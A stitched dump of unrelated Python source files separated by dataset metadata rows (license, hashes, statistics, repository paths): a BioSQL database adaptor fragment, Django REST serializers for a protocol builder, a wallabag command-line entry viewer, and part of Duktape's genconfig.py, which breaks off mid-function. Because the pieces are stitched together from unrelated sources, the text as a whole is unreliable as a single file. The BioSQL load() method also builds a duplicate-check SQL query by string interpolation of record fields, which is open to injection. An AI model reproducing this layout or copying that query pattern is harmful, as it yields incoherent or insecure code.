return self._convert_list(rv)
def fetchone(self):
tuple_ = self.real_cursor.fetchone()
return self._convert_tuple(tuple_)
class Adaptor(object):
"""High level wrapper for a database connection and cursor
Most database calls in BioSQL are done indirectly though this adaptor
class. This provides helper methods for fetching data and executing
sql.
"""
def __init__(self, conn, dbutils, wrap_cursor=False):
self.conn = conn
if wrap_cursor:
self.cursor = _CursorWrapper(conn.cursor())
else:
self.cursor = conn.cursor()
self.dbutils = dbutils
def last_id(self, table):
return self.dbutils.last_id(self.cursor, table)
def autocommit(self, y=True):
"""Set the autocommit mode. True values enable; False value disable."""
return self.dbutils.autocommit(self.conn, y)
def commit(self):
"""Commits the current transaction."""
return self.conn.commit()
def rollback(self):
"""Rolls backs the current transaction."""
return self.conn.rollback()
def close(self):
"""Close the connection. No further activity possible."""
return self.conn.close()
def fetch_dbid_by_dbname(self, dbname):
self.execute(
r"select biodatabase_id from biodatabase where name = %s",
(dbname,))
rv = self.cursor.fetchall()
if not rv:
raise KeyError("Cannot find biodatabase with name %r" % dbname)
return rv[0][0]
def fetch_seqid_by_display_id(self, dbid, name):
sql = r"select bioentry_id from bioentry where name = %s"
fields = [name]
if dbid:
sql += " and biodatabase_id = %s"
fields.append(dbid)
self.execute(sql, fields)
rv = self.cursor.fetchall()
if not rv:
raise IndexError("Cannot find display id %r" % name)
if len(rv) > 1:
raise IndexError("More than one entry with display id %r" % name)
return rv[0][0]
def fetch_seqid_by_accession(self, dbid, name):
sql = r"select bioentry_id from bioentry where accession = %s"
fields = [name]
if dbid:
sql += " and biodatabase_id = %s"
fields.append(dbid)
self.execute(sql, fields)
rv = self.cursor.fetchall()
if not rv:
raise IndexError("Cannot find accession %r" % name)
if len(rv) > 1:
raise IndexError("More than one entry with accession %r" % name)
return rv[0][0]
def fetch_seqids_by_accession(self, dbid, name):
sql = r"select bioentry_id from bioentry where accession = %s"
fields = [name]
if dbid:
sql += " and biodatabase_id = %s"
fields.append(dbid)
return self.execute_and_fetch_col0(sql, fields)
def fetch_seqid_by_version(self, dbid, name):
acc_version = name.split(".")
if len(acc_version) > 2:
raise IndexError("Bad version %r" % name)
acc = acc_version[0]
if len(acc_version) == 2:
version = acc_version[1]
else:
version = "0"
sql = r"SELECT bioentry_id FROM bioentry WHERE accession = %s" \
r" AND version = %s"
fields = [acc, version]
if dbid:
sql += " and biodatabase_id = %s"
fields.append(dbid)
self.execute(sql, fields)
rv = self.cursor.fetchall()
if not rv:
raise IndexError("Cannot find version %r" % name)
if len(rv) > 1:
raise IndexError("More than one entry with version %r" % name)
return rv[0][0]
def fetch_seqid_by_identifier(self, dbid, identifier):
# YB: was fetch_seqid_by_seqid
sql = "SELECT bioentry_id FROM bioentry WHERE identifier = %s"
fields = [identifier]
if dbid:
sql += " and biodatabase_id = %s"
fields.append(dbid)
self.execute(sql, fields)
rv = self.cursor.fetchall()
if not rv:
raise IndexError("Cannot find display id %r" % identifier)
return rv[0][0]
def list_biodatabase_names(self):
return self.execute_and_fetch_col0(
"SELECT name FROM biodatabase")
def list_bioentry_ids(self, dbid):
return self.execute_and_fetch_col0(
"SELECT bioentry_id FROM bioentry WHERE biodatabase_id = %s",
(dbid,))
def list_bioentry_display_ids(self, dbid):
return self.execute_and_fetch_col0(
"SELECT name FROM bioentry WHERE biodatabase_id = %s",
(dbid,))
def list_any_ids(self, sql, args):
"""Return ids given a SQL statement to select for them.
This assumes that the given SQL does a SELECT statement that
returns a list of items. This parses them out of the 2D list
they come as and just returns them in a list.
"""
return self.execute_and_fetch_col0(sql, args)
def execute_one(self, sql, args=None):
"""Execute sql that returns 1 record, and return the record"""
self.execute(sql, args or ())
rv = self.cursor.fetchall()
assert len(rv) == 1, "Expected 1 response, got %d" % len(rv)
return rv[0]
def execute(self, sql, args=None):
"""Just execute an sql command.
"""
if os.name == "java":
sql = sql.replace("%s", "?")
self.dbutils.execute(self.cursor, sql, args)
def get_subseq_as_string(self, seqid, start, end):
length = end - start
# XXX Check this on MySQL and PostgreSQL. substr should be general,
# does it need dbutils?
# return self.execute_one(
# """select SUBSTRING(seq FROM %s FOR %s)
# from biosequence where bioentry_id = %s""",
# (start+1, length, seqid))[0]
#
# Convert to a string on returning for databases that give back
# unicode. Shouldn't need unicode for sequences so this seems safe.
return str(self.execute_one(
"""select SUBSTR(seq, %s, %s)
from biosequence where bioentry_id = %s""",
(start + 1, length, seqid))[0])
def execute_and_fetch_col0(self, sql, args=None):
self.execute(sql, args or ())
return [field[0] for field in self.cursor.fetchall()]
def execute_and_fetchall(self, sql, args=None):
self.execute(sql, args or ())
return self.cursor.fetchall()
class MysqlConnectorAdaptor(Adaptor):
"""A BioSQL Adaptor class with fixes for the MySQL interface
BioSQL was failing due to returns of bytearray objects from
the mysql-connector-python database connector. This adaptor
class scrubs returns of bytearrays and of byte strings converting
them to string objects instead. This adaptor class was made in
response to backwards incompatible changes added to
mysql-connector-python in release 2.0.0 of the package.
"""
def execute_one(self, sql, args=None):
out = super(MysqlConnectorAdaptor, self).execute_one(sql, args)
return tuple(bytearray_to_str(v) for v in out)
def execute_and_fetch_col0(self, sql, args=None):
out = super(MysqlConnectorAdaptor, self).execute_and_fetch_col0(sql, args)
return [bytearray_to_str(column) for column in out]
def execute_and_fetchall(self, sql, args=None):
out = super(MysqlConnectorAdaptor, self).execute_and_fetchall(sql, args)
return [tuple(bytearray_to_str(v) for v in o) for o in out]
_interface_specific_adaptors = {
# If SQL interfaces require a specific adaptor, use this to map the adaptor
"mysql.connector": MysqlConnectorAdaptor
}
_allowed_lookups = {
# Lookup name / function name to get id, function to list all ids
'primary_id': "fetch_seqid_by_identifier",
'gi': "fetch_seqid_by_identifier",
'display_id': "fetch_seqid_by_display_id",
'name': "fetch_seqid_by_display_id",
'accession': "fetch_seqid_by_accession",
'version': "fetch_seqid_by_version",
}
class BioSeqDatabase(object):
"""Represents a namespace (sub-database) within the BioSQL database.
i.e. One row in the biodatabase table, and all all rows in the bioentry
table associated with it.
"""
def __init__(self, adaptor, name):
self.adaptor = adaptor
self.name = name
self.dbid = self.adaptor.fetch_dbid_by_dbname(name)
def __repr__(self):
return "BioSeqDatabase(%r, %r)" % (self.adaptor, self.name)
def get_Seq_by_id(self, name):
"""Gets a DBSeqRecord object by its name
Example: seq_rec = db.get_Seq_by_id('ROA1_HUMAN')
The name of this method is misleading since it returns a DBSeqRecord
rather than a DBSeq ojbect, and presumably was to mirror BioPerl.
"""
seqid = self.adaptor.fetch_seqid_by_display_id(self.dbid, name)
return BioSeq.DBSeqRecord(self.adaptor, seqid)
def get_Seq_by_acc(self, name):
"""Gets a DBSeqRecord object by accession number
Example: seq_rec = db.get_Seq_by_acc('X77802')
The name of this method is misleading since it returns a DBSeqRecord
rather than a DBSeq ojbect, and presumably was to mirror BioPerl.
"""
seqid = self.adaptor.fetch_seqid_by_accession(self.dbid, name)
return BioSeq.DBSeqRecord(self.adaptor, seqid)
def get_Seq_by_ver(self, name):
"""Gets a DBSeqRecord object by version number
Example: seq_rec = db.get_Seq_by_ver('X77802.1')
The name of this method is misleading since it returns a DBSeqRecord
rather than a DBSeq ojbect, and presumably was to mirror BioPerl.
"""
seqid = self.adaptor.fetch_seqid_by_version(self.dbid, name)
return BioSeq.DBSeqRecord(self.adaptor, seqid)
def get_Seqs_by_acc(self, name):
"""Gets a list of DBSeqRecord objects by accession number
Example: seq_recs = db.get_Seq_by_acc('X77802')
The name of this method is misleading since it returns a list of
DBSeqRecord objects rather than a list of DBSeq ojbects, and presumably
was to mirror BioPerl.
"""
seqids = self.adaptor.fetch_seqids_by_accession(self.dbid, name)
return [BioSeq.DBSeqRecord(self.adaptor, seqid) for seqid in seqids]
def get_all_primary_ids(self):
"""All the primary_ids of the sequences in the database (OBSOLETE).
These maybe ids (display style) or accession numbers or
something else completely different - they *are not*
meaningful outside of this database implementation.
Please use .keys() instead of .get_all_primary_ids()
"""
import warnings
warnings.warn("Use bio_seq_database.keys() instead of "
"bio_seq_database.get_all_primary_ids()",
BiopythonDeprecationWarning)
return list(self.keys())
def __getitem__(self, key):
return BioSeq.DBSeqRecord(self.adaptor, key)
def __delitem__(self, key):
"""Remove an entry and all its annotation."""
if key not in self:
raise KeyError(key)
# Assuming this will automatically cascade to the other tables...
sql = "DELETE FROM bioentry " + \
"WHERE biodatabase_id=%s AND bioentry_id=%s;"
self.adaptor.execute(sql, (self.dbid, key))
def __len__(self):
"""Number of records in this namespace (sub database)."""
sql = "SELECT COUNT(bioentry_id) FROM bioentry " + \
"WHERE biodatabase_id=%s;"
return int(self.adaptor.execute_and_fetch_col0(sql, (self.dbid, ))[0])
def __contains__(self, value):
"""Check if a primary (internal) id is this namespace (sub database)."""
sql = "SELECT COUNT(bioentry_id) FROM bioentry " + \
"WHERE biodatabase_id=%s AND bioentry_id=%s;"
# The bioentry_id field is an integer in the schema.
# PostgreSQL will throw an error if we use a non integer in the query.
try:
bioentry_id = int(value)
except ValueError:
return False
return bool(self.adaptor.execute_and_fetch_col0(sql,
(self.dbid, bioentry_id))[0])
def __iter__(self):
"""Iterate over ids (which may not be meaningful outside this database)."""
# TODO - Iterate over the cursor, much more efficient
return iter(self.adaptor.list_bioentry_ids(self.dbid))
if hasattr(dict, "iteritems"):
# Python 2, use iteritems etc
def keys(self):
"""List of ids which may not be meaningful outside this database."""
return self.adaptor.list_bioentry_ids(self.dbid)
def values(self):
"""List of DBSeqRecord objects in the namespace (sub database)."""
return [self[key] for key in self]
def items(self):
"""List of (id, DBSeqRecord) for the namespace (sub database)."""
return [(key, self[key]) for key in self]
def iterkeys(self):
"""Iterate over ids (which may not be meaningful outside this database)."""
return iter(self)
def itervalues(self):
"""Iterate over DBSeqRecord objects in the namespace (sub database)."""
for key in self:
yield self[key]
def iteritems(self):
"""Iterate over (id, DBSeqRecord) for the namespace (sub database)."""
for key in self:
yield key, self[key]
else:
# Python 3, items etc are all iterators
def keys(self):
"""Iterate over ids (which may not be meaningful outside this database)."""
return iter(self)
def values(self):
"""Iterate over DBSeqRecord objects in the namespace (sub database)."""
for key in self:
yield self[key]
def items(self):
"""Iterate over (id, DBSeqRecord) for the namespace (sub database)."""
for key in self:
yield key, self[key]
def lookup(self, **kwargs):
if len(kwargs) != 1:
raise TypeError("single key/value parameter expected")
k, v = list(kwargs.items())[0]
if k not in _allowed_lookups:
raise TypeError("lookup() expects one of %r, not %r" %
(list(_allowed_lookups.keys()), k))
lookup_name = _allowed_lookups[k]
lookup_func = getattr(self.adaptor, lookup_name)
seqid = lookup_func(self.dbid, v)
return BioSeq.DBSeqRecord(self.adaptor, seqid)
def get_Seq_by_primary_id(self, seqid):
"""Get a DBSeqRecord by the primary (internal) id (OBSOLETE).
Rather than db.get_Seq_by_primary_id(my_id) use db[my_id]
The name of this method is misleading since it returns a DBSeqRecord
rather than a DBSeq ojbect, and presumably was to mirror BioPerl.
"""
import warnings
warnings.warn("Use bio_seq_database[my_id] instead of "
"bio_seq_database.get_Seq_by_primary_id(my_id)",
BiopythonDeprecationWarning)
return self[seqid]
def load(self, record_iterator, fetch_NCBI_taxonomy=False):
"""Load a set of SeqRecords into the BioSQL database.
record_iterator is either a list of SeqRecord objects, or an
Iterator object that returns SeqRecord objects (such as the
output from the Bio.SeqIO.parse() function), which will be
used to populate the database.
fetch_NCBI_taxonomy is boolean flag allowing or preventing
connection to the taxonomic database on the NCBI server
(via Bio.Entrez) to fetch a detailed taxonomy for each
SeqRecord.
Example:
from Bio import SeqIO
count = db.load(SeqIO.parse(open(filename), format))
Returns the number of records loaded.
"""
db_loader = Loader.DatabaseLoader(self.adaptor, self.dbid,
fetch_NCBI_taxonomy)
num_records = 0
global _POSTGRES_RULES_PRESENT
for cur_record in record_iterator:
num_records += 1
# Hack to work arround BioSQL Bug 2839 - If using PostgreSQL and
# the RULES are present check for a duplicate record before loading
if _POSTGRES_RULES_PRESENT:
# Recreate what the Loader's _load_bioentry_table will do:
if cur_record.id.count(".") == 1:
accession, version = cur_record.id.split('.')
try:
version = int(version)
except ValueError:
accession = cur_record.id
version = 0
else:
accession = cur_record.id
version = 0
gi = cur_record.annotations.get("gi", None)
sql = "SELECT bioentry_id FROM bioentry WHERE (identifier " + \
"= '%s' AND biodatabase_id = '%s') OR (accession = " + \
"'%s' AND version = '%s' AND biodatabase_id = '%s')"
self.adaptor.execute(
sql % (gi, self.dbid, accession, version, self.dbid))
if self.adaptor.cursor.fetchone():
raise self.adaptor.conn.IntegrityError("Duplicate record "
"detected: record has not been inserted")
# End of hack
db_loader.load_seqrecord(cur_record)
return num_records
|
apache-2.0
| 1,127,389,766,597,076,100 | 38.044929 | 100 | 0.594523 | false | 4.016374 | false | false | false |
SanaMobile/sana.protocol_builder
|
src-django/api/serializer.py
|
1
|
7122
|
from collections import OrderedDict
from rest_framework import serializers
from rest_framework.fields import SkipField
from django.contrib.auth.models import User
import models
import field
import json
class ElementSerializer(serializers.ModelSerializer):
choices = field.ArrayAsStringField(required=False)
answer = field.ArrayAsStringField(required=False)
class Meta:
model = models.Element
fields = (
'id',
'display_index',
'concept',
'question',
'answer',
'page',
'choices',
'required',
'image',
'audio',
'action',
'mime_type',
'element_type',
'last_modified',
'created'
)
def to_representation(self, instance):
"""
Object instance -> Dict of primitive datatypes.
"""
ret = OrderedDict()
fields = [field for field in self.fields.values() if not field.write_only]
for field in fields:
try:
attribute = field.get_attribute(instance)
except SkipField:
continue
if attribute is not None:
ret[field.field_name] = field.to_representation(attribute)
return ret
def validate(self, data):
if data['element_type'] in models.Element.CHOICE_TYPES:
# Choice-based element needs to have a valid answer
answers = json.loads(data['answer'])
choices = json.loads(data['choices'])
if data['element_type'] != 'MULTI_SELECT':
if len(answers) > 1:
raise serializers.ValidationError('Answer must have at most 1 choice')
for answer in answers:
if answer not in choices:
raise serializers.ValidationError('Answer must be one of the choices')
return data
class AbstractElementSerializer(serializers.ModelSerializer):
choices = field.ArrayAsStringField(required=False)
answer = field.ArrayAsStringField(required=False)
class Meta:
model = models.AbstractElement
fields = (
'id',
'display_index',
'concept',
'subroutine',
'question',
'answer',
'choices',
'required',
'image',
'audio',
'action',
'mime_type',
'element_type',
'last_modified',
'created'
)
def to_representation(self, instance):
"""
Object instance -> Dict of primitive datatypes.
"""
ret = OrderedDict()
fields = [field for field in self.fields.values() if not field.write_only]
for field in fields:
try:
attribute = field.get_attribute(instance)
except SkipField:
continue
if attribute is not None:
ret[field.field_name] = field.to_representation(attribute)
return ret
def validate(self, data):
if data['element_type'] in models.Element.CHOICE_TYPES:
# Choice-based element needs to have a valid answer
answers = json.loads(data['answer'])
choices = json.loads(data['choices'])
if data['element_type'] != 'MULTI_SELECT':
if len(answers) > 1:
raise serializers.ValidationError('Answer must have at most 1 choice')
for answer in answers:
if answer not in choices:
raise serializers.ValidationError('Answer must be one of the choices')
return data
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
class PageListSerializer(serializers.ListSerializer):
class Meta(object):
model = models.Page
def update(self, instance, validated_data):
current_page_mapping = {page.id: page for page in instance}
new_data_mapping = {item['id']: item for item in validated_data}
result = []
for new_page_id, data in new_data_mapping.items():
page = current_page_mapping.get(new_page_id, None)
if page is not None:
result.append(self.child.update(page, data))
return result
class ShowIfSerializer(serializers.ModelSerializer):
conditions = field.ConditionTreeField(required=True)
class Meta:
model = models.ShowIf
fields = (
'id',
'page',
'last_modified',
'created',
'conditions'
)
class PageSerializer(serializers.ModelSerializer):
elements = ElementSerializer(many=True, read_only=True)
show_if = ShowIfSerializer(many=True, read_only=True)
id = serializers.IntegerField(read_only=False, required=False)
class Meta:
model = models.Page
list_serializer_class = PageListSerializer
fields = (
'id',
'display_index',
'procedure',
'elements',
'last_modified',
'created',
'show_if'
)
class ProcedureSerializer(serializers.ModelSerializer):
owner = serializers.ReadOnlyField(source='owner.id')
class Meta:
model = models.Procedure
fields = (
'id',
'title',
'author',
'uuid',
'owner',
'last_modified',
'created',
'version'
)
class ProcedureDetailSerializer(ProcedureSerializer):
owner = serializers.ReadOnlyField(source='owner.id')
pages = PageSerializer(many=True, read_only=True)
class Meta(ProcedureSerializer.Meta):
model = models.Procedure
depth = 1
fields = ProcedureSerializer.Meta.fields + ('pages',)
class ConceptSerializer(serializers.ModelSerializer):
abstractelement = AbstractElementSerializer(many=True, read_only=True)
id = serializers.IntegerField(read_only=False, required=False)
class Meta:
model = models.Concept
fields = (
'id',
'uuid',
'created',
'last_modified',
'name',
'abstractelement',
'display_name',
'description',
'data_type',
'mime_type',
'constraint'
)
class SubroutineSerializer(serializers.ModelSerializer):
abstractelements = AbstractElementSerializer(many=True, read_only=True)
id = serializers.IntegerField(read_only=False, required=False)
class Meta:
model = models.Subroutine
fields = (
'id',
'uuid',
'created',
'last_modified',
'name',
'abstractelements',
'display_name',
'description',
)
class MDSInstanceSerializer(serializers.ModelSerializer):
class Meta:
model = models.MDSInstance
fields = (
'api_url',
'api_key',
)
|
bsd-3-clause
| -1,810,374,835,869,102,800 | 26.712062 | 90 | 0.55827 | false | 4.676297 | false | false | false |
Nepochal/wallabag-cli
|
wallabag/wallabag_show.py
|
1
|
3546
|
"""
Show a wallabag entry
"""
import io
import formatter
import json
import os
from sys import exit
import sys
from bs4 import BeautifulSoup
import api
import conf
import entry
def show(entry_id, colors=True, raw=False, html=False):
"""
Main function for showing an entry.
"""
conf.load()
try:
request = api.api_get_entry(entry_id)
__handle_request_error(request)
entr = entry.Entry(json.loads(request.response))
except api.OAuthException as ex:
print("Error: {0}".format(ex.text))
print()
exit(-1)
title = entr.title
try:
delimiter = "".ljust(os.get_terminal_size().columns, '=')
# piped output to file or other process
except OSError:
delimiter = "\n"
article = entr.content
if not html:
article = html2text(article, colors)
output = "{0}\n{1}\n{2}".format(title, delimiter, article)
if not raw:
output = __format_text(output)
print(output)
def html2text(html, colors=True):
soup = BeautifulSoup(html, "html.parser")
# Color h1-h3
if colors:
h1colors = '\033[93m'
h1colore = '\033[0m'
else:
h1colors = h1colore = ""
for h1 in soup.findAll('h1'):
h1.string = "\n{0}{1}{2}".format(h1colors, h1.string, h1colore)
for h2 in soup.findAll('h2'):
h2.string = "\n{0}{1}{2}".format(h1colors, h2.string, h1colore)
for h3 in soup.findAll('h3'):
h3.string = "\n{0}{1}{2}".format(h1colors, h3.string, h1colore)
if colors:
# Color bold texts
bcolors = '\033[92m'
bcolore = '\033[0m'
for bold in soup.findAll('b'):
bold.string = "{0}{1}{2}".format(bcolors, bold.string, bcolore)
for bold in soup.findAll('strong'):
bold.string = "{0}{1}{2}".format(bcolors, bold.string, bcolore)
# Replace hr with visual lines
try:
hrstring = "".ljust(os.get_terminal_size().columns, '-')
# piped output to file or other process
except OSError:
hrstring = "-----"
for hr in soup.findAll('hr'):
replace = soup.new_tag('p')
replace.string = hrstring
hr.insert_after(replace)
hr.unwrap()
# Replace images by information-texts
for img in soup.findAll('img'):
replace = soup.new_tag('p')
try:
alt = " \"{0}\"".format(img['alt'])
except KeyError:
alt = ""
replace.string = "[IMAGE{0}]\n".format(alt)
img.insert_after(replace)
img.unwrap()
return soup.text
def __format_text(text):
try:
maxcol = os.get_terminal_size().columns
# piped output to file or other process
except OSError:
maxcol = sys.maxsize
ret = ""
for line in text.splitlines():
ios = io.StringIO()
writer = formatter.DumbWriter(ios, maxcol=maxcol)
writer.send_flowing_data(line)
ret = "{0}{1}\n".format(ret, ios.getvalue())
ios.close()
return ret
def __handle_request_error(request):
if request.has_error():
if request.error == api.Error.http_forbidden or request.error == api.Error.http_not_found:
print("Error: Invalid entry id.")
print()
exit(-1)
print("Error: {0} - {1}".format(request.error_text,
request.error_description))
exit(-1)
|
mit
| 553,081,221,058,167,040 | 25.703125 | 98 | 0.551043 | false | 3.6 | false | false | false |
jmptrader/duktape
|
tools/genconfig.py
|
1
|
56701
|
#!/usr/bin/env python2
#
# Process Duktape option metadata and produce various useful outputs:
#
# - duk_config.h with specific or autodetected platform, compiler, and
# architecture, forced options, sanity checks, etc
# - option documentation for Duktape config options (DUK_USE_xxx)
#
# Genconfig tries to build all outputs based on modular metadata, so that
# managing a large number of config options (which is hard to avoid given
# the wide range of targets Duktape supports) remains maintainable.
#
# Genconfig does *not* try to support all exotic platforms out there.
# Instead, the goal is to allow the metadata to be extended, or to provide
# a reasonable starting point for manual duk_config.h tweaking.
#
import logging
import sys
logging.basicConfig(level=logging.INFO, stream=sys.stdout, format='%(name)-21s %(levelname)-7s %(message)s')
logger = logging.getLogger('genconfig.py')
logger.setLevel(logging.INFO)
import os
import re
import json
import yaml
import optparse
import tarfile
import tempfile
import atexit
import shutil
import logging
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
#
# Globals holding scanned metadata, helper snippets, etc
#
# Metadata to scan from config files.
use_defs = None
use_defs_list = None
opt_defs = None
opt_defs_list = None
use_tags = None
use_tags_list = None
tags_meta = None
required_use_meta_keys = [
'define',
'introduced',
'default',
'tags',
'description'
]
allowed_use_meta_keys = [
'define',
'introduced',
'deprecated',
'removed',
'unused',
'requires',
'conflicts',
'related',
'default',
'tags',
'description',
'warn_if_missing'
]
required_opt_meta_keys = [
'define',
'introduced',
'tags',
'description'
]
allowed_opt_meta_keys = [
'define',
'introduced',
'deprecated',
'removed',
'unused',
'requires',
'conflicts',
'related',
'tags',
'description'
]
# Preferred tag order for option documentation.
doc_tag_order = [
'portability',
'memory',
'lowmemory',
'ecmascript',
'execution',
'debugger',
'debug',
'development'
]
# Preferred tag order for generated C header files.
header_tag_order = doc_tag_order
# Helper headers snippets.
helper_snippets = None
# Assume these provides come from outside.
assumed_provides = {
'DUK_SINGLE_FILE': True, # compiling Duktape from a single source file (duktape.c) version
'DUK_COMPILING_DUKTAPE': True, # compiling Duktape (not user application)
'DUK_CONFIG_H_INCLUDED': True, # artifact, include guard
}
# Platform files must provide at least these (additional checks
# in validate_platform_file()). Fill-ins provide missing optionals.
platform_required_provides = [
'DUK_USE_OS_STRING' # must be #define'd
]
# Architecture files must provide at least these (additional checks
# in validate_architecture_file()). Fill-ins provide missing optionals.
architecture_required_provides = [
'DUK_USE_ARCH_STRING'
]
# Compiler files must provide at least these (additional checks
# in validate_compiler_file()). Fill-ins provide missing optionals.
compiler_required_provides = [
# Compilers need a lot of defines; missing defines are automatically
# filled in with defaults (which are mostly compiler independent), so
# the requires define list is not very large.
'DUK_USE_COMPILER_STRING', # must be #define'd
'DUK_USE_BRANCH_HINTS', # may be #undef'd, as long as provided
'DUK_USE_VARIADIC_MACROS', # may be #undef'd, as long as provided
'DUK_USE_UNION_INITIALIZERS' # may be #undef'd, as long as provided
]
#
# Miscellaneous helpers
#
def get_auto_delete_tempdir():
tmpdir = tempfile.mkdtemp(suffix='-genconfig')
def _f(dirname):
logger.debug('Deleting temporary directory: %r' % dirname)
if os.path.isdir(dirname) and '-genconfig' in dirname:
shutil.rmtree(dirname)
atexit.register(_f, tmpdir)
return tmpdir
def strip_comments_from_lines(lines):
# Not exact but close enough. Doesn't handle string literals etc,
# but these are not a concrete issue for scanning preprocessor
# #define references.
#
# Comment contents are stripped of any DUK_ prefixed text to avoid
# incorrect requires/provides detection. Other comment text is kept;
# in particular a "/* redefine */" comment must remain intact here.
# (The 'redefine' hack is not actively needed now.)
#
# Avoid Python 2.6 vs. Python 2.7 argument differences.
def censor(x):
return re.sub(re.compile('DUK_\w+', re.MULTILINE), 'xxx', x.group(0))
tmp = '\n'.join(lines)
tmp = re.sub(re.compile('/\*.*?\*/', re.MULTILINE | re.DOTALL), censor, tmp)
tmp = re.sub(re.compile('//.*?$', re.MULTILINE), censor, tmp)
return tmp.split('\n')
# Header snippet representation: lines, provides defines, requires defines.
re_line_provides = re.compile(r'^#(?:define|undef)\s+(\w+).*$')
re_line_requires = re.compile(r'(DUK_[A-Z0-9_]+)') # uppercase only, don't match DUK_USE_xxx for example
class Snippet:
lines = None # lines of text and/or snippets
provides = None # map from define to 'True' for now
requires = None # map from define to 'True' for now
def __init__(self, lines, provides=None, requires=None, autoscan_requires=True, autoscan_provides=True):
self.lines = []
if not isinstance(lines, list):
raise Exception('Snippet constructor must be a list (not e.g. a string): %s' % repr(lines))
for line in lines:
if isinstance(line, str):
self.lines.append(line)
elif isinstance(line, unicode):
self.lines.append(line.encode('utf-8'))
else:
raise Exception('invalid line: %r' % line)
self.provides = {}
if provides is not None:
for k in provides.keys():
self.provides[k] = True
self.requires = {}
if requires is not None:
for k in requires.keys():
self.requires[k] = True
stripped_lines = strip_comments_from_lines(lines)
#for line in stripped_lines:
# logger.debug(line)
for line in stripped_lines:
# Careful with order, snippet may self-reference its own
# defines in which case there's no outward dependency.
# (This is not 100% because the order of require/provide
# matters and this is not handled now.)
#
# Also, some snippets may #undef/#define another define but
# they don't "provide" the define as such. Such redefinitions
# are marked "/* redefine */" in the snippets. They're best
# avoided (and not currently needed in Duktape 1.4.0).
if autoscan_provides:
m = re_line_provides.match(line)
if m is not None and '/* redefine */' not in line and \
len(m.group(1)) > 0 and m.group(1)[-1] != '_':
# Don't allow e.g. DUK_USE_ which results from matching DUK_USE_xxx
#logger.debug('PROVIDES: %r' % m.group(1))
self.provides[m.group(1)] = True
if autoscan_requires:
matches = re.findall(re_line_requires, line)
for m in matches:
if len(m) > 0 and m[-1] == '_':
# Don't allow e.g. DUK_USE_ which results from matching DUK_USE_xxx
pass
elif m[:7] == 'DUK_OPT':
#logger.warning('Encountered DUK_OPT_xxx in a header snippet: %s' % repr(line))
# DUK_OPT_xxx always come from outside
pass
elif m[:7] == 'DUK_USE':
# DUK_USE_xxx are internal and they should not be 'requirements'
pass
elif self.provides.has_key(m):
# Snippet provides it's own require; omit
pass
else:
#logger.debug('REQUIRES: %r' % m)
self.requires[m] = True
def fromFile(cls, filename):
lines = []
with open(filename, 'rb') as f:
for line in f:
if line[-1] == '\n':
line = line[:-1]
if line[:8] == '#snippet':
m = re.match(r'#snippet\s+"(.*?)"', line)
# XXX: better plumbing for lookup path
sub_fn = os.path.normpath(os.path.join(filename, '..', '..', 'header-snippets', m.group(1)))
logger.debug('#snippet ' + sub_fn)
sn = Snippet.fromFile(sub_fn)
lines += sn.lines
else:
lines.append(line)
return Snippet(lines, autoscan_requires=True, autoscan_provides=True)
fromFile = classmethod(fromFile)
def merge(cls, snippets):
ret = Snippet([], [], [])
for s in snippets:
ret.lines += s.lines
for k in s.provides.keys():
ret.provides[k] = True
for k in s.requires.keys():
ret.requires[k] = True
return ret
merge = classmethod(merge)
# Helper for building a text file from individual lines, injected files, etc.
# Inserted values are converted to Snippets so that their provides/requires
# information can be tracked. When non-C outputs are created, these will be
# bogus but ignored.
class FileBuilder:
vals = None # snippet list
base_dir = None
use_cpp_warning = False
def __init__(self, base_dir=None, use_cpp_warning=False):
self.vals = []
self.base_dir = base_dir
self.use_cpp_warning = use_cpp_warning
def line(self, line):
self.vals.append(Snippet([ line ]))
def lines(self, lines):
if len(lines) > 0 and lines[-1] == '\n':
lines = lines[:-1] # strip last newline to avoid empty line
self.vals.append(Snippet(lines.split('\n')))
def empty(self):
self.vals.append(Snippet([ '' ]))
def rst_heading(self, title, char, doubled=False):
tmp = []
if doubled:
tmp.append(char * len(title))
tmp.append(title)
tmp.append(char * len(title))
self.vals.append(Snippet(tmp))
def snippet_relative(self, fn):
sn = Snippet.fromFile(os.path.join(self.base_dir, fn))
self.vals.append(sn)
return sn
def snippet_absolute(self, fn):
sn = Snippet.fromFile(fn)
self.vals.append(sn)
return sn
def cpp_error(self, msg):
# XXX: assume no newlines etc
self.vals.append(Snippet([ '#error %s' % msg ]))
def cpp_warning(self, msg):
# XXX: assume no newlines etc
# XXX: support compiler specific warning mechanisms
if self.use_cpp_warning:
# C preprocessor '#warning' is often supported
self.vals.append(Snippet([ '#warning %s' % msg ]))
else:
self.vals.append(Snippet([ '/* WARNING: %s */' % msg ]))
def cpp_warning_or_error(self, msg, is_error=True):
if is_error:
self.cpp_error(msg)
else:
self.cpp_warning(msg)
def chdr_comment_line(self, msg):
self.vals.append(Snippet([ '/* %s */' % msg ]))
def chdr_block_heading(self, msg):
lines = []
lines.append('')
lines.append('/*')
lines.append(' * ' + msg)
lines.append(' */')
lines.append('')
self.vals.append(Snippet(lines))
def join(self):
tmp = []
for line in self.vals:
if not isinstance(line, object):
raise Exception('self.vals must be all snippets')
for x in line.lines: # x is a Snippet
tmp.append(x)
return '\n'.join(tmp)
def fill_dependencies_for_snippets(self, idx_deps):
fill_dependencies_for_snippets(self.vals, idx_deps)
# Insert missing define dependencies into index 'idx_deps' repeatedly
# until no unsatisfied dependencies exist. This is used to pull in
# the required DUK_F_xxx helper defines without pulling them all in.
# The resolution mechanism also ensures dependencies are pulled in the
# correct order, i.e. DUK_F_xxx helpers may depend on each other (as
# long as there are no circular dependencies).
#
# XXX: this can be simplified a lot
def fill_dependencies_for_snippets(snippets, idx_deps):
# graph[A] = [ B, ... ] <-> B, ... provide something A requires.
graph = {}
snlist = []
resolved = [] # for printing only
def add(sn):
if sn in snlist:
return # already present
snlist.append(sn)
to_add = []
for k in sn.requires.keys():
if assumed_provides.has_key(k):
continue
found = False
for sn2 in snlist:
if sn2.provides.has_key(k):
if not graph.has_key(sn):
graph[sn] = []
graph[sn].append(sn2)
found = True # at least one other node provides 'k'
if not found:
logger.debug('Resolving %r' % k)
resolved.append(k)
# Find a header snippet which provides the missing define.
# Some DUK_F_xxx files provide multiple defines, so we don't
# necessarily know the snippet filename here.
sn_req = None
for sn2 in helper_snippets:
if sn2.provides.has_key(k):
sn_req = sn2
break
if sn_req is None:
logger.debug(repr(sn.lines))
raise Exception('cannot resolve missing require: %r' % k)
# Snippet may have further unresolved provides; add recursively
to_add.append(sn_req)
if not graph.has_key(sn):
graph[sn] = []
graph[sn].append(sn_req)
for sn in to_add:
add(sn)
